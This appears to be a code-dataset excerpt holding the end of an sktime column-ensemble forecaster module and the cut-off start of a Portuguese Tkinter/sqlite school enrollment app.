_steps_fitted_attr = \"forecasters_\"\n\n def __init__(self, forecasters):\n self.forecasters = forecasters\n super().__init__(forecasters=forecasters)\n\n # set requires-fh-in-fit depending on forecasters\n if isinstance(forecasters, BaseForecaster):\n tags_to_clone = [\n \"requires-fh-in-fit\",\n \"capability:pred_int\",\n \"ignores-exogeneous-X\",\n \"handles-missing-data\",\n ]\n self.clone_tags(forecasters, tags_to_clone)\n else:\n l_forecasters = [(x[0], x[1]) for x in forecasters]\n self._anytagis_then_set(\"requires-fh-in-fit\", True, False, l_forecasters)\n self._anytagis_then_set(\"capability:pred_int\", False, True, l_forecasters)\n self._anytagis_then_set(\"ignores-exogeneous-X\", False, True, l_forecasters)\n self._anytagis_then_set(\"handles-missing-data\", False, True, l_forecasters)\n\n @property\n def _forecasters(self):\n \"\"\"Make internal list of forecasters.\n\n The list only contains the name and forecasters, dropping the columns. This is\n for the implementation of get_params via _HeterogenousMetaEstimator._get_params\n which expects lists of tuples of len 2.\n \"\"\"\n forecasters = self.forecasters\n if isinstance(forecasters, BaseForecaster):\n return [(\"forecasters\", forecasters)]\n else:\n return [(name, forecaster) for name, forecaster, _ in self.forecasters]\n\n @_forecasters.setter\n def _forecasters(self, value):\n if len(value) == 1 and isinstance(value, BaseForecaster):\n self.forecasters = value\n elif len(value) == 1 and isinstance(value, list):\n self.forecasters = value[0][1]\n else:\n self.forecasters = [\n (name, forecaster, columns)\n for ((name, forecaster), (_, _, columns)) in zip(\n value, self.forecasters\n )\n ]\n\n def _fit(self, y, X, fh):\n \"\"\"Fit to training data.\n\n Parameters\n ----------\n y : pd.DataFrame\n Target time series to which to fit the forecaster.\n fh : int, list or np.array, optional (default=None)\n The forecasters horizon with the steps ahead to to predict.\n X : pd.DataFrame, optional (default=None)\n Exogenous variables are ignored.\n\n Returns\n -------\n self : returns an instance of self.\n \"\"\"\n forecasters = self._check_forecasters(y)\n\n self.forecasters_ = []\n self.y_columns = list(y.columns)\n\n for name, forecaster, index in forecasters:\n forecaster_ = forecaster.clone()\n\n pd_index = self._coerce_to_pd_index(index, self._y.columns)\n\n forecaster_.fit(y.loc[:, pd_index], X, fh)\n self.forecasters_.append((name, forecaster_, index))\n\n return self\n\n def _update(self, y, X=None, update_params=True):\n \"\"\"Update fitted parameters.\n\n Parameters\n ----------\n y : pd.DataFrame\n X : pd.DataFrame\n update_params : bool, optional, default=True\n\n Returns\n -------\n self : an instance of self.\n \"\"\"\n for _, forecaster, index in self.forecasters_:\n pd_index = self._coerce_to_pd_index(index, self._y.columns)\n forecaster.update(y.loc[:, pd_index], X, update_params=update_params)\n return self\n\n def _predict(self, fh=None, X=None):\n \"\"\"Forecast time series at future horizon.\n\n private _predict containing the core logic, called from predict\n\n State required:\n Requires state to be \"fitted\".\n\n Accesses in self:\n Fitted model attributes ending in \"_\"\n self.cutoff\n\n Parameters\n ----------\n fh : guaranteed to be ForecastingHorizon or None, optional (default=None)\n The forecasting horizon with the steps ahead to to predict.\n If not passed in _fit, guaranteed to be passed here\n X : pd.DataFrame, optional (default=None)\n Exogenous time series\n\n Returns\n -------\n y_pred : pd.Series\n Point predictions\n \"\"\"\n return self._by_column(\"predict\", fh=fh, X=X)\n\n def _predict_quantiles(self, fh=None, X=None, alpha=None):\n \"\"\"Compute/return prediction quantiles for a forecast.\n\n private _predict_quantiles containing the core logic,\n called from predict_quantiles and possibly predict_interval\n\n State required:\n Requires state to be \"fitted\".\n\n Accesses in self:\n Fitted model attributes ending in \"_\"\n self.cutoff\n\n Parameters\n ----------\n fh : guaranteed to be ForecastingHorizon\n The forecasting horizon with the steps ahead to to predict.\n X : optional (default=None)\n guaranteed to be of a type in self.get_tag(\"X_inner_mtype\")\n Exogeneous time series to predict from.\n alpha : list of float (guaranteed not None and floats in [0,1] interval)\n A list of probabilities at which quantile forecasts are computed.\n\n Returns\n -------\n pred_quantiles : pd.DataFrame\n Column has multi-index: first level is variable name from y in fit,\n second level being the quantile forecasts for each alpha.\n Quantile forecasts are calculated for each a in alpha.\n Row index is fh. Entries are quantile forecasts, for var in col index,\n at quantile probability in second-level col index, for each row index.\n \"\"\"\n out = self._by_column(\n \"predict_quantiles\",\n fh=fh,\n X=X,\n alpha=alpha,\n col_multiindex=True,\n )\n if len(out.columns.get_level_values(0).unique()) == 1:\n out.columns = out.columns.droplevel(level=0)\n else:\n out.columns = out.columns.droplevel(level=1)\n return out\n\n def _predict_interval(self, fh=None, X=None, coverage=None):\n \"\"\"Compute/return prediction quantiles for a forecast.\n\n private _predict_interval containing the core logic,\n called from predict_interval and possibly predict_quantiles\n\n State required:\n Requires state to be \"fitted\".\n\n Accesses in self:\n Fitted model attributes ending in \"_\"\n self.cutoff\n\n Parameters\n ----------\n fh : guaranteed to be ForecastingHorizon\n The forecasting horizon with the steps ahead to to predict.\n X : optional (default=None)\n guaranteed to be of a type in self.get_tag(\"X_inner_mtype\")\n Exogeneous time series to predict from.\n coverage : list of float (guaranteed not None and floats in [0,1] interval)\n nominal coverage(s) of predictive interval(s)\n\n Returns\n -------\n pred_int : pd.DataFrame\n Column has multi-index: first level is variable name from y in fit,\n second level coverage fractions for which intervals were computed.\n in the same order as in input `coverage`.\n Third level is string \"lower\" or \"upper\", for lower/upper interval end.\n Row index is fh. Entries are forecasts of lower/upper interval end,\n for var in col index, at nominal coverage in second col index,\n lower/upper depending on third col index, for the row index.\n Upper/lower interval end forecasts are equivalent to\n quantile forecasts at alpha = 0.5 - c/2, 0.5 + c/2 for c in coverage.\n \"\"\"\n out = self._by_column(\n \"predict_interval\",\n fh=fh,\n X=X,\n coverage=coverage,\n col_multiindex=True,\n )\n if len(out.columns.get_level_values(0).unique()) == 1:\n out.columns = out.columns.droplevel(level=0)\n else:\n out.columns = out.columns.droplevel(level=1)\n return out\n\n def _predict_var(self, fh, X=None, cov=False):\n \"\"\"Forecast variance at future horizon.\n\n private _predict_var containing the core logic, called from predict_var\n\n Parameters\n ----------\n fh : guaranteed to be ForecastingHorizon or None, optional (default=None)\n The forecasting horizon with the steps ahead to to predict.\n If not passed in _fit, guaranteed to be passed here\n X : pd.DataFrame, optional (default=None)\n Exogenous time series\n cov : bool, optional (default=False)\n if True, computes covariance matrix forecast.\n if False, computes marginal variance forecasts.\n\n Returns\n -------\n pred_var : pd.DataFrame, format dependent on `cov` variable\n If cov=False:\n Column names are exactly those of `y` passed in `fit`/`update`.\n For nameless formats, column index will be a RangeIndex.\n Row index is fh. Entries are variance forecasts, for var in col index.\n If cov=True:\n Column index is a multiindex: 1st level is variable names (as above)\n 2nd level is fh.\n Row index is fh.\n Entries are (co-)variance forecasts, for var in col index, and\n covariance between time index in row and col.\n \"\"\"\n return self._by_column(\"predict_var\", fh=fh, X=X, cov=cov, col_multiindex=True)\n\n def _check_forecasters(self, y):\n \"\"\"Check self.forecasters parameter and coerce to (name, est, index).\n\n Checks:\n\n * `self.forecasters` is single forecaster, or\n * `self.forecasters` is list of (name, forecaster, index)\n * all `forecaster` above inherit from `BaseForecaster`\n * `y.columns` is disjoint union of `index` appearing above\n\n Parameters\n ----------\n y : `pandas` object with `columns` attribute of `pd.Index` type\n\n Returns\n -------\n list of (name, estimator, index) such that union of index is `y.columns`;\n and estimator is estimator inheriting from `BaseForecaster`\n\n Raises\n ------\n ValueError if checks fail, with informative error message\n \"\"\"\n return self._check_col_estimators(\n X=y, X_name=\"y\", est_attr=\"forecasters\", cls=BaseForecaster\n )\n\n @classmethod\n def get_test_params(cls, parameter_set=\"default\"):\n \"\"\"Return testing parameter settings for the estimator.\n\n Parameters\n ----------\n parameter_set : str, default=\"default\"\n Name of the set of test parameters to return, for use in tests. If no\n special parameters are defined for a value, will return `\"default\"` set.\n\n\n Returns\n -------\n params : dict or list of dict, default={}\n Parameters to create testing instances of the class.\n Each dict are parameters to construct an \"interesting\" test instance, i.e.,\n `MyClass(**params)` or `MyClass(**params[i])` creates a valid test instance.\n `create_test_instance` uses the first (or only) dictionary in `params`.\n \"\"\"\n # imports\n from sktime.forecasting.naive import NaiveForecaster\n from sktime.forecasting.trend import TrendForecaster\n\n params1 = {\"forecasters\": NaiveForecaster()}\n params2 = {\"forecasters\": TrendForecaster()}\n\n return [params1, params2]\n", "repo_name": "sktime/sktime", "sub_path": "sktime/forecasting/compose/_column_ensemble.py", "file_name": "_column_ensemble.py", "file_ext": "py", "file_size_in_byte": 15868, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 7028, "dataset": "github-code", "pt": "52", "api": [{"api_name": "sktime.forecasting.base._meta._HeterogenousEnsembleForecaster", "line_number": 13, "usage_type": "name"}, {"api_name": "sktime.base._meta._ColumnEstimator", "line_number": 13, "usage_type": "name"}, {"api_name": "sktime.forecasting.base._base.BaseForecaster", "line_number": 113, "usage_type": "argument"}, {"api_name": "sktime.forecasting.base._base.BaseForecaster", "line_number": 137, "usage_type": "argument"}, {"api_name": "sktime.forecasting.base._base.BaseForecaster", "line_number": 144, "usage_type": "argument"}, {"api_name": "sktime.forecasting.base._base.BaseForecaster", "line_number": 382, "usage_type": "name"}, {"api_name": "sktime.forecasting.naive.NaiveForecaster", "line_number": 408, "usage_type": "call"}, {"api_name": "sktime.forecasting.trend.TrendForecaster", "line_number": 409, "usage_type": "call"}]} +{"seq_id": "27558290021", "text": "# coding: utf-8\nimport Tkinter as tk\nimport sqlite3\n\n\nFOOTER_FONT = ('Verdana', '8')\nSMALL_FONT = ('Verdana', '10')\nNORMAL_FONT = ('Verdana', '10', 'bold')\nLARGE_FONT = ('Verdana', '12', 'italic', 'bold')\nLARGE1_FONT = ('Verdana', '12', 'italic')\nTITLE_FONT = ('Verdana', '14', 'italic', 'bold')\nSUBTITLE_FONT = ('Verdana', '12', 'italic', 'bold')\n\n\n\n\ndef fechapopup(popup, parent, frame):\n\n\tparent.show_frame(frame)\n\tpopup.destroy()\n\n\n\n\n\nclass SecretariaApp(tk.Tk):\n\n\tdef __init__(self, *args, **kwargs):\n\n\t\n\t\ttk.Tk.__init__(self, *args, **kwargs)\n\t\ttk.Tk.wm_title(self, \"Colégio Escolha Certa\")\n\t\t\n\n\t\tcontainer = tk.Frame(self)\n\t\tcontainer.grid()\n\t\tcontainer.grid_rowconfigure(0, weight=1)\n\t\tcontainer.grid_columnconfigure(0, weight=1)\n\n\t\tself.frames = {}\n\t\t\n\t\tfor F in (PaginaInicial, Alunos, Turmas, Matricular, Buscar, TodosAlunos):\n\t\t\n\t\t\tframe = F(self, container)\n\t\n\t\t\tself.frames[F] = frame\n\n\t\t\tframe.grid(row=0, column=0, sticky=\"nsew\")\n\t\t\t\n\t\n\t\tself.show_frame(PaginaInicial)\n\n\n\tdef show_frame(self, cont):\n\n\t\n\t\tframe = self.frames[cont]\n\t\tframe.tkraise()\n\n\n\n\nclass PaginaInicial(tk.Frame):\n\n\tdef __init__(self, parent, controller):\n\t\ttk.Frame.__init__(self, parent)\n\n\n\t\tparent.geometry(\"680x500+200+200\")\n\t\n\n\n\t\tself.label = tk.Label(self, text = 'Colégio Escolha Certa', fg = 'black', font = TITLE_FONT, height = 3, width = 50)\n\t\tself.label.pack(pady=10, padx=10)\n\n\n\t\tself.botao1 = tk.Button(self, text = 'Alunos', fg = 'black', font = LARGE_FONT, height = 3, width = 50,command=lambda: parent.show_frame(Alunos))\n\t\tself.botao1.pack()\n\n\t\tself.botao2 = tk.Button(self, text = 'Turmas', fg = 'black', font = LARGE_FONT, height = 3, width = 50,command=lambda: parent.show_frame(Turmas))\n\t\tself.botao2.pack()\n\n\n\t\tself.botao3 = tk.Button(self, text = 'Sair', fg = 'black', font = LARGE_FONT, height = 3, width = 50, command=quit)\n\t\tself.botao3.pack()\n\n\n\nclass Alunos(tk.Frame):\n\n\tdef __init__(self, parent, controller):\n\t\ttk.Frame.__init__(self, parent)\n\n\n\n\n\t\tself.label = tk.Label(self, text = 'Colégio Escolha Certa', fg = 'black', font = TITLE_FONT, height = 3, width = 50)\n\t\tself.label.pack(pady=10, padx=10)\n\n\n\t\tself.label2 = tk.Label(self, text = 'Alunos', fg = 'black', font = SUBTITLE_FONT, height = 3, width = 50)\n\t\tself.label2.focus_force()\t\t\n\t\tself.label2.pack(pady=10, padx=10)\n\n\t\t\n\t\tself.botao1 = tk.Button(self, text = 'Matricular', fg = 'black', font = LARGE_FONT, height = 3, width = 50,command=lambda: parent.show_frame(Matricular))\n\t\tself.botao1.pack()\n\n\t\tself.botao2 = tk.Button(self, text = 'Buscar Aluno', fg = 'black', font = LARGE_FONT, height = 3, width = 50,command=lambda: parent.show_frame(Buscar))\n\t\tself.botao2.pack()\n\n\t\tself.botao3 = tk.Button(self, text = 'Voltar', fg = 'black', font = LARGE_FONT, height = 3, width = 50,command=lambda: parent.show_frame(PaginaInicial))\n\t\tself.botao3.pack()\n\n\n\n\n\n\n\nclass Turmas(tk.Frame):\n\n\tdef __init__(self, parent, controller):\n\t\ttk.Frame.__init__(self, parent)\n\n\n\t\tself.label = tk.Label(self, text = 'Colégio Escolha Certa', fg = 'black', font = TITLE_FONT, height = 3, width = 50)\n\t\tself.label.place(x=20, y=0)\n\n\t\tself.label1 = tk.Label(self, text=\"Visualizar Turmas\", font=TITLE_FONT, height = 3, width = 50)\n\t\tself.label1.place(x=20, y=50)\n\t\t\n\t\tself.todos = tk.Button(self, text = 'Todos os Alunos', fg = 'black', font = SMALL_FONT,command=lambda: parent.show_frame(TodosAlunos))\n\t\tself.todos.place(x=50, y=73)\n\n\n\t\tself.serie = tk.IntVar()\n\t\tself.serie.set(0)\n\t\tself.turno = tk.StringVar()\n\t\tself.turno.set(\"a\")\n\n\t\tself.series = []\n\t\tself.turnos = []\n\n\t\tself.serielabel = tk.Label(self, text=\"Série:*\", font=LARGE1_FONT)\n\t\tself.serielabel.place(x=10, y=150)\n\n\t\tself.turnolabel = tk.Label(self, text=\"Turno:*\", font=LARGE1_FONT)\n\t\tself.turnolabel.place(x=290, y=150)\n\n\n\t\tfor i in range(3):\n\n\t\t\tpos_x = (80+80*i)\n\n\t\t\tself.series.append(tk.Radiobutton(self, text=i+1, value=i+1,state=\"active\", variable=self.serie, font=LARGE1_FONT))\n\t\t\tself.series[i].place(x=pos_x, y= 150)\n\n\t\tTURNO = [(\"Manhã\",0), (\"Tarde\",1)]\n\n\t\tfor turno, indices in TURNO:\n\t\t\n\t\t\tpos_x = (360+120*indices)\n\n\t\t\tself.turnos.append(tk.Radiobutton(self, text=turno, value=turno,state=\"active\", variable=self.turno, font=LARGE1_FONT))\n\t\t\tself.turnos[indices].place(x=pos_x, y= 150)\n\n\t\tself.botaobuscar = tk.Button(self, text = 'Buscar', fg = 'black', font = SMALL_FONT,command=lambda: buscar(self))\n\t\tself.botaobuscar.place(x=250, y=250)\n\n\n\t\tself.botaovoltar = tk.Button(self, text = 'Voltar', fg = 'black', font = SMALL_FONT,command=lambda: voltarinicial(self, parent))\n\t\tself.botaovoltar.place(x=350, y=250)\n\n\t\tself.legendalabel = tk.Label(self, text=\"(*) Campos obrigatórios\", font=FOOTER_FONT)\n\t\tself.legendalabel.place(x=50, y=300)\n\n\t\tdef voltarinicial(self, parent):\n\n\t\t\tself.serie.set(0)\t\n\t\t\tself.turno.set(\"a\")\n\t\t\n\t\t\tparent.show_frame(PaginaInicial)\n\n\t\tdef buscar(self):\n\t\n\t\t\tfor i in range(3):\n\n\t\t\t\tself.series[i].destroy()\n\n\n\t\t\tfor i in range(2):\n\t\t\n\t\t\t\tself.turnos[i].destroy()\n\n\t\t\tself.botaobuscar.destroy()\n\t\t\tself.botaovoltar.destroy()\n\t\t\tself.legendalabel.destroy()\n\t\t\tself.serielabel.destroy()\n\t\t\tself.turnolabel.destroy()\n\t\t\tself.todos.destroy()\n\n\t\t\tself.serielabel = tk.Label(self, text=\"Série:\", font=LARGE_FONT)\n\t\t\tself.serielabel.place(x=90, y=130)\n\n\t\t\tself.series = tk.Label(self, text=self.serie.get(), font=LARGE_FONT)\n\t\t\tself.series.place(x=190, y=130)\n\n\n\t\t\tself.turnolabel = tk.Label(self, text=\"Turno:\", font=LARGE_FONT)\n\t\t\tself.turnolabel.place(x=290, y=130)\n\n\t\t\tself.turnos = tk.Label(self, text=self.turno.get(), font=LARGE_FONT)\n\t\t\tself.turnos.place(x=400, y=130)\n\n\t\t\tself.matriculalabel = tk.Label(self, text = \"Matrícula\", font=LARGE_FONT)\n\t\t\tself.matriculalabel.place(x=120, y=170)\t\t\n\t\t\n\t\t\tself.matricula = tk.Label(self, font=SMALL_FONT)\n\t\t\tself.matricula.place(x=160,y=200)\n\t\t\n\n\t\t\tself.alunoslabel = tk.Label(self, text = \"Aluno\", font=LARGE_FONT)\n\t\t\tself.alunoslabel.place(x=400, y=170)\n\t\t\n\t\t\tself.alunos = tk.Label(self, font=SMALL_FONT)\n\t\t\tself.alunos.place(x=300,y=200)\n\n\t\t\tconnection = sqlite3.connect('alunos.db')\n\t\t\tc = connection.cursor()\n\n\t\t\t\n\t\t\tc.execute('SELECT id,nome,turno FROM alunos WHERE serie = ?', [(self.serie.get())])\n\n\t\t\tself.lista = c.fetchall()\t\t\t\n\n\t\t\tmatricula=\"\"\n\t\t\talunos=\"\"\n\n\t\t\t\n\t\t\tfor i in range(len(self.lista)):\n\t\t\n\n\t\t\t\tif self.lista[i][2] == self.turno.get():\t\n\t\t\t\t\tmatricula = matricula+str(self.lista[i][0])+'\\n'\n\t\t\t\t\talunos = alunos+self.lista[i][1]+'\\n'\n\n\n\t\t\tself.matricula[\"text\"] = matricula[0:len(matricula)-1]\n\t\t\tself.alunos[\"text\"] = alunos[0:len(alunos)-1]\n\n\t\t\tself.botaovoltar = tk.Button(self, text = 'Voltar', fg = 'black',command=lambda: voltar(self, parent))\n\t\t\tself.botaovoltar.place(x=60, y=60)\n\n\t\tdef voltar(self, parent):\n\t\t\t\n\t\t\tself.serielabel.destroy()\n\t\t\tself.series.destroy()\n\t\t\tself.turnolabel.destroy()\n\t\t\tself.turnos.destroy()\n\t\t\tself.botaovoltar.destroy()\n\t\t\tself.matricula.destroy()\n\t\t\tself.matriculalabel.destroy()\n\t\t\tself.alunos.destroy()\n\t\t\tself.alunoslabel.destroy()\n\t\t\tself.serie.set(0)\n\t\t\tself.turno.set(\"a\")\n\n\t\t\tself.series = []\n\t\t\tself.turnos = []\n\n\t\t\tself.serielabel = tk.Label(self, text=\"Série:*\", font=LARGE1_FONT)\n\t\t\tself.serielabel.place(x=10, y=150)\n\n\t\t\tself.turnolabel = tk.Label(self, text=\"Turno:*\", font=LARGE1_FONT)\n\t\t\tself.turnolabel.place(x=290, y=150)\n\n\t\t\tself.todos = tk.Button(self, text = 'Todos os Alunos', fg = 'black', font = SMALL_FONT,command=lambda: parent.show_frame(TodosAlunos))\n\t\t\tself.todos.place(x=50, y=73)\n\n\n\n\t\t\tfor i in range(3):\n\n\t\t\t\tpos_x = (80+80*i)\n\n\t\t\t\tself.series.append(tk.Radiobutton(self, text=i+1, value=i+1,state=\"active\", variable=self.serie, font=LARGE1_FONT))\n\t\t\t\tself.series[i].place(x=pos_x, y= 150)\n\n\t\t\tTURNO = [(\"Manhã\",0), (\"Tarde\",1)]\n\n\t\t\tfor turno, indices in TURNO:\n\t\t\n\t\t\t\tpos_x = (360+120*indices)\n\n\t\t\t\tself.turnos.append(tk.Radiobutton(self, text=turno, value=turno,state=\"active\", variable=self.turno, font=LARGE1_FONT))\n\t\t\t\tself.turnos[indices].place(x=pos_x, y= 150)\n\n\t\t\tself.botaobuscar = tk.Button(self, text = 'Buscar', fg = 'black', font = SMALL_FONT,command=lambda: buscar(self))\n\t\t\tself.botaobuscar.place(x=250, y=250)\n\n\n\t\t\tself.botaovoltar = tk.Button(self, text = 'Voltar', fg = 'black', font = SMALL_FONT,command=lambda: voltarinicial(self, parent))\n\t\t\tself.botaovoltar.place(x=350, y=250)\n\n\t\t\tself.legendalabel = tk.Label(self, text=\"(*) Campos obrigatórios\", font=FOOTER_FONT)\n\t\t\tself.legendalabel.place(x=50, y=300)\n\t\n\n\t\t\t\n\t\t\tparent.show_frame(PaginaInicial)\n\n\n\n\n\nclass Matricular(tk.Frame):\n\n\n\tdef __init__(self, parent, controller):\n\t\ttk.Frame.__init__(self, parent)\n\n\n\t\tparent.minsize(width= 500, height = 500)\n\n\t\tself.serie = tk.IntVar()\n\t\tself.serie.set(0)\n\t\tself.turno = tk.StringVar()\n\t\tself.turno.set(\"a\")\n\n\t\tself.label = tk.Label(self, text = 'Colégio Escolha Certa', fg = 'black', font = TITLE_FONT, height = 3, width = 50)\n\t\tself.label.place(x=20, y=0)\n\n\t\tself.label1 = tk.Label(self, text=\"Realizar Matricula\", font=TITLE_FONT, height = 3, width = 50)\n\t\tself.label1.place(x=20, y=50)\n\n\t\tself.nomelabel = tk.Label(self, text=\"Nome do aluno: *\", font=SMALL_FONT)\n\t\tself.nomelabel.place(x=50, y=110)\n\n\t\tself.nome = tk.Entry(self, width=40, font=SMALL_FONT)\n\t\tself.nome.place(x=180, y=110)\t\n\n\t\tself.nascimentolabel = tk.Label(self, text=\"Data de Nascimento: *\", font=SMALL_FONT)\n\t\tself.nascimentolabel.place(x=50,y=140)\n\t\n\t\tself.nascimento = tk.Entry(self, width=20, font=SMALL_FONT)\n\t\tself.nascimento.insert(0, \"DD/MM/AAAA\")\n\t\tself.nascimento.place(x=220, y=140)\n\n\t\tself.responsavellabel = tk.Label(self, text=\"Responsável: *\", font=SMALL_FONT)\n\t\tself.responsavellabel.place(x=50,y=170)\n\t\tself.responsavel = tk.Entry(self, width=40, font=SMALL_FONT)\n\t\tself.responsavel.place(x=180,y=170)\n\n\t\tself.serielabel = tk.Label(self, text=\"Série: *\", font=SMALL_FONT)\n\t\tself.serielabel.place(x=50,y=200)\n\t\t\n\t\tself.check1 = tk.Radiobutton(self, text=\"1\", value=1,state=\"active\", variable=self.serie, font=SMALL_FONT)\n\t\tself.check1.place(x=180,y=200)\n\n\t\tself.check2 = tk.Radiobutton(self, text=\"2\", value=2,state=\"active\", variable=self.serie, font=SMALL_FONT)\n\t\tself.check2.place(x= 240,y=200)\n\t\tself.check3 = tk.Radiobutton(self, text=\"3\", value=3,state=\"active\", variable=self.serie, font=SMALL_FONT)\n\t\tself.check3.place(x=300,y=200)\n\n\t\tself.turnolabel = tk.Label(self, text=\"Turno: *\", font=SMALL_FONT)\n\t\tself.turnolabel.place(x=50,y=230)\n\t\tself.check4 = tk.Radiobutton(self, text=\"Manhã\", value=\"Manhã\",state=\"active\", variable=self.turno, font=SMALL_FONT)\n\t\tself.check4.place(x=180,y=230)\n\t\tself.check5 = tk.Radiobutton(self, text=\"Tarde\", value=\"Tarde\",state=\"active\", variable=self.turno, font=SMALL_FONT)\n\t\tself.check5.place(x=300,y=230)\n\n\n\t\tself.botao1 = tk.Button(self, text=\"Matricular\",fg = 'black', font=SMALL_FONT,command=lambda: matricular(self, parent))\n\t\tself.botao1.place(x=250,y=260)\n\n\n\t\tself.botao2 = tk.Button(self, text = 'Voltar', fg = 'black', font = SMALL_FONT,command=lambda: voltar(parent))\n\t\tself.botao2.place(x=350, y=260)\n\n\t\tself.legendalabel = tk.Label(self, text=\"(*) Campos obrigatórios\", font=FOOTER_FONT)\n\t\tself.legendalabel.place(x=50, y=300)\n\n\n\t\n\n\t\tdef matricular(self, controller):\n\n\t\t\t\n\t\t\tNOME = self.nome.get().upper()\n\t\t\tNASCIMENTO = self.nascimento.get()\n\t\t\tRESPONSAVEL = self.responsavel.get().upper()\n\n\n\t\t\tif NOME == \"\" or NASCIMENTO == \"\" or RESPONSAVEL == \"\" or self.serie.get() == 0 or self.turno.get() == \"a\":\n\t\t\t\t\n\t\t\t\tcamposvazios()\n\t\t\t\n\t\t\telif NASCIMENTO == \"DD/MM/AAAA\":\n\t\t\t\n\t\t\t\tvalidarnascimento()\n\n\t\t\t\n\t\t\telif len(NASCIMENTO) != 10:\n\t\t\t\t\n\t\t\t\tvalidarnascimento()\n\t\t\t\n\n\t\t\telse:\n\n\t\t\t\tconnection = sqlite3.connect('alunos.db')\n\t\t\t\tc = connection.cursor()\n\t\t\t\t\n\n\n\t\t\t\tc.execute('CREATE TABLE IF NOT EXISTS alunos (id INTEGER NOT NULL PRIMARY KEY AUTOINCREMENT,\tnome TEXT, nascimento TEXT, responsavel TEXT, serie TEXT, turno TEXT)')\n\n\t\t\t\tc.execute('CREATE TABLE IF NOT EXISTS boletim (aluno_id INTEGER, boletim_id TEXT NOT NULL PRIMARY KEY, port INTEGER, mat INTEGER, geo INTEGER, hist INTEGER, bio INTEGER, fis INTEGER, qui INTEGER, FOREIGN KEY(aluno_id) REFERENCES alunos(id))')\n\n\n\n\t\t\t\tc.execute('INSERT INTO alunos (nome, nascimento, responsavel, serie, turno) VALUES(?,?,?,?,?)', (NOME, NASCIMENTO, RESPONSAVEL, self.serie.get(), self.turno.get()))\n\t\t\t\tc.execute('SELECT id FROM alunos WHERE nome = ?', ([NOME]))\n\t\t\t\t\n\t\t\t\tmatricula = c.fetchall()\n\t\t\t\tboletim = []\n\t\t\t\tfor i in range (1,5,1):\n\t\t\t\t\tboletim.append(str(matricula[0][0])+str(i))\n\t\t\t\tfor i in range(len(boletim)):\n\t\t\t\t\tc.execute('INSERT INTO boletim (aluno_id, boletim_id) VALUES (?,?)', (matricula[0][0], boletim[i]))\n\t\t\t\t\t\n\t\t\t\t\n\n\t\t\t\tconnection.commit()\n\t\t\t\tconnection.close()\n\n\n\t\t\t\tself.nome.delete(0, len(NOME))\n\t\t\t\tself.nascimento.delete(0, len(NASCIMENTO))\n\t\t\t\tself.responsavel.delete(0, len(RESPONSAVEL))\n\t\t\t\tself.nascimento.insert(0, \"DD/MM/AAAA\")\n\t\t\t\tself.serie.set(0)\n\t\t\t\tself.turno.set(\"a\")\n\n\t\t\t\t\t\t\t\n\t\t\t\topcao(parent)\n\n\t\tdef voltar(parent):\n\t\t\n\t\t\tself.nome.delete(0, len(self.nome.get()))\n\t\t\tself.nascimento.delete(0, len(self.nascimento.get()))\n\t\t\tself.responsavel.delete(0, len(self.responsavel.get()))\n\t\t\tself.nascimento.insert(0, \"DD/MM/AAAA\")\n\t\t\tself.serie.set(0)\n\t\t\tself.turno.set(\"a\")\n\n\n\t\t\tparent.show_frame(PaginaInicial)\n\t\n\n\n\t\tdef camposvazios():\n\t\t\tpopup = tk.Tk()\n\t\t\tpopup.title(\"Campos Vazios!\")\n\t\t\tlabel = tk.Label(popup, text=\"Por favor, antes de matricular o aluno preencha os campos vazios!\")\n\t\t\tlabel.grid(row=\"1\",column=\"1\", columnspan=\"2\")\n\t\t\tB1 = tk.Button(popup, text=\"Ok\", command=lambda: popup.destroy())\n\t\t\tB1.grid(row=\"2\",column=\"1\", sticky=\"e\")\n\n\t\tdef validarnascimento():\n\n\t\t\tpopup = tk.Tk()\n\t\t\tpopup.title(\"Data de nascimento inválida!\")\n\t\t\tlabel = tk.Label(popup, text=\"Por favor, verifique a data de nascimento antes de continuar!\")\n\t\t\tlabel.grid(row=\"1\",column=\"1\", columnspan=\"2\")\n\t\t\tB1 = tk.Button(popup, text=\"Ok\", command=lambda: popup.destroy())\n\t\t\tB1.grid(row=\"2\",column=\"1\", sticky=\"e\")\n\n\t\tdef opcao(parent):\n\t\t\n\t\t\tpopup = tk.Tk()\n\t\t\tpopup.title(\"Matrícula realizada!\")\n\t\t\tlabel = tk.Label(popup, text=\"Deseja realizar outra matricula?\", width = 32)\n\t\t\tlabel.grid(row=\"1\",column=\"1\", columnspan=\"2\")\n\t\t\tB1 = tk.Button(popup, text=\"Sim\", command=lambda: popup.destroy())\n\t\t\tB1.grid(row=\"2\",column=\"1\", sticky=\"e\")\n\t\t\tB2 = tk.Button(popup, text=\"Não\", command=lambda: fechapopup(popup, parent, PaginaInicial))\n\t\t\tB2.grid(row=\"2\",column=\"2\", sticky=\"w\")\n\n\n\n\nclass Buscar(tk.Frame):\n\n\tdef __init__(self, parent, controller):\n\t\ttk.Frame.__init__(self, parent)\n\n\n\t\tself.label = tk.Label(self, text = 'Colégio Escolha Certa', fg = 'black', font = TITLE_FONT, height = 3, width = 50)\n\t\tself.label.place(x=20, y=0)\n\n\n\t\tself.label1 = tk.Label(self, text=\"Buscar Aluno\", font=TITLE_FONT, height = 3, width = 50)\n\t\tself.label1.place(x=20, y=50)\n\n\n\t\tself.nomelabel = tk.Label(self, text=\"Nome do aluno:\", font=SMALL_FONT)\n\t\tself.nomelabel.place(x=50, y=110)\n\n\n\t\tself.aluno = tk.Entry(self, width=40, font=SMALL_FONT)\n\t\tself.aluno.place(x=180, y=110)\n\n\n\n\t\tself.botao1 = tk.Button(self, text=\"Buscar\",fg = 'black', font=SMALL_FONT,command=lambda: buscar(self))\n\t\tself.botao1.place(x=250,y=150)\n\t\t\n\n\n\t\tself.botao2 = tk.Button(self, text = 'Voltar', fg = 'black', font = SMALL_FONT,command=lambda: voltarinicial(self, parent))\n\t\tself.botao2.place(x=350, y=150)\n\n\t\t\n\n\t\tdef voltarinicial(self, parent):\n\n\t\t\tself.aluno.delete(0, len(self.aluno.get()))\n\t\t\tparent.show_frame(PaginaInicial)\n\t\t\n\n\t\n\t\t\n\n\t\tdef buscar(self):\n\t\t\t\n\t\n\t\t\tself.matriculalabel = tk.Label(self, text = \"Matrícula\", font=LARGE_FONT)\n\t\t\tself.matriculalabel.place(x=50, y=200)\t\t\n\t\t\n\n\n\n\t\t\tself.matricula = tk.Label(self, font=SMALL_FONT)\n\t\t\tself.matricula.place(x=70,y=230)\n\t\t\n\n\t\t\tself.alunoslabel = tk.Label(self, text = \"Aluno\", font=LARGE_FONT)\n\t\t\tself.alunoslabel.place(x=280, y=200)\n\t\t\n\t\t\tself.alunos = tk.Label(self, 